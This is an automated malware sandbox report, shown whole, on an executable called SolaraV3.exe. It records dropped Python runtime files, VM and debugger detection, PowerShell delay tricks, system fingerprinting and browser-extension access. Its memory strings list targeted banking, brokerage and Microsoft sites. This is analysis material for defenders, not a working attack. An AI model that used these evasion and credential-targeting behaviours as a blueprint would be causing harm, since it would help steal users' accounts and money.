              Source: C:\Users\user\Desktop\SolaraV3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeEvaded block: after key decisiongraph_110-39798
              Source: C:\Users\user\Desktop\SolaraV3.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-18324
              Source: C:\Users\user\Desktop\SolaraV3.exeAPI coverage: 4.9 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4296Thread sleep count: 8015 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4296Thread sleep count: 1366 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008Thread sleep time: -9223372036854770s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4456Thread sleep count: 7779 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2256Thread sleep count: 1625 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5944Thread sleep time: -11068046444225724s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 4908Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840Thread sleep count: 6689 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840Thread sleep count: 2824 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6612Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4732Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep count: 1348 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6056Thread sleep count: 5447 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4684Thread sleep time: -17524406870024063s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608Thread sleep count: 1321 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6076Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep count: 4059 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep count: 201 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636Thread sleep count: 5225 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636Thread sleep count: 877 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3540Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5448Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376Thread sleep count: 4076 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep count: 284 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC709280 FindFirstFileExW,FindClose,1_2_00007FF6DC709280
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6DC7083C0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF6DC721874
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC709280 FindFirstFileExW,FindClose,2_2_00007FF6DC709280
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF6DC721874
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF6DC7083C0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81322E MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFB2AD9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,2_2_00007FFB0B81322E
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE946EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,110_2_00007FF74EE946EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EED88E0 FindFirstFileExA,110_2_00007FF74EED88E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE8E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,110_2_00007FF74EE8E21C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior
              Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtrayZ
              Source: getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: svchost.exe, 0000001A.00000002.2809507862.000001407B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2811395049.000001407C854000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
              Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmsrvcZ
              Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
              Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmusrvcZ
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: rar.exe, 0000006E.00000003.1935668462.000001DD0C739000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\MW
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer5
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxserviceZ
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: SolaraV3.exe, 00000002.00000003.1920657343.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2526D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2042793103.000001FC256C4000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1767469686.000001FC256C4000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1919694922.000001FC2612A000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2526D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770391926.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2045845216.000001FC2611B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1579360087.000001FC25402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: rar.exe, 0000006E.00000003.1935668462.000001DD0C739000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779208598.00000236408C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777587060.00000236408BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
              Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareuserZ
              Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qemu-gaZ
              Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779208598.00000236408C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777587060.00000236408BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwarec
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwaretrayZ
              Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-Vf
              Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer5Z
              Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8157312_2_00007FFB0B815731
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8142462_2_00007FFB0B814246
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B815731 rdtsc 2_2_00007FFB0B815731
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC71A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6DC71A614
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0BB66EE0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FFB0BB66EE0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC723480 GetProcessHeap,1_2_00007FF6DC723480
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC71A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6DC71A614
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC70D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6DC70D12C
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC70C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF6DC70C8A0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC70D30C SetUnhandledExceptionFilter,1_2_00007FF6DC70D30C
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC71A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6DC71A614
